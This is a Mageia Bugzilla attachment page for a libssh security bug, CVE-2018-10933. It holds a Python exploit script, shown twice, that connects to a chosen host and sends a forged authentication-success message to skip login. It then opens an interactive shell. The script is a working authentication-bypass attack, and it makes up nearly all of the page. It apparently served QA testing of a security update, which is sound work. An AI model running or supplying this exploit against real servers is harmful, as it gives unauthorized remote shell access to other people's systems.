Mageia Bugzilla – Attachment 10451 Details for
Bug 23711
libssh new security issue CVE-2018-10933
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
python3 exploit file for CVE-2018-10933
45638.py (text/x-python), 1.42 KB, created by
Len Lawrence
on 2018-11-06 19:20:43 CET
(
hide
)
Description:
python3 exploit file for CVE-2018-10933
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2018-11-06 19:20:43 CET
Size:
1.42 KB
patch
obsolete
>#!/usr/bin/env python3 >import paramiko >import socket >import argparse >from sys import argv, exit > > >parser = argparse.ArgumentParser(description="libSSH Authentication Bypass") >parser.add_argument('--host', help='Host') >parser.add_argument('-p', '--port', help='libSSH port', default=22) >parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log") > >args = parser.parse_args() > > >def BypasslibSSHwithoutcredentials(hostname, port): > > sock = socket.socket() > try: > sock.connect((str(hostname), int(port))) > > message = paramiko.message.Message() > transport = paramiko.transport.Transport(sock) > transport.start_client() > > message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) > transport._send_message(message) > > spawncmd = transport.open_session() > spawncmd.invoke_shell() > return 0 > > except paramiko.SSHException as e: > print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable") > return 1 > except socket.error: > print("Unable to connect.") > return 1 > > >def main(): > paramiko.util.log_to_file(args.logfile) > try: > hostname = args.host > port = args.port > except: > parser.print_help() > exit(1) > BypasslibSSHwithoutcredentials(hostname, port) > >if __name__ == '__main__': > exit(main())
#!/usr/bin/env python3 import paramiko import socket import argparse from sys import argv, exit parser = argparse.ArgumentParser(description="libSSH Authentication Bypass") parser.add_argument('--host', help='Host') parser.add_argument('-p', '--port', help='libSSH port', default=22) parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log") args = parser.parse_args() def BypasslibSSHwithoutcredentials(hostname, port): sock = socket.socket() try: sock.connect((str(hostname), int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) spawncmd = transport.open_session() spawncmd.invoke_shell() return 0 except paramiko.SSHException as e: print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable") return 1 except socket.error: print("Unable to connect.") return 1 def main(): paramiko.util.log_to_file(args.logfile) try: hostname = args.host port = args.port except: parser.print_help() exit(1) BypasslibSSHwithoutcredentials(hostname, port) if __name__ == '__main__': exit(main())
View Attachment As Raw
Actions:
View
Attachments on
bug 23711
:
10410
|
10411
| 10451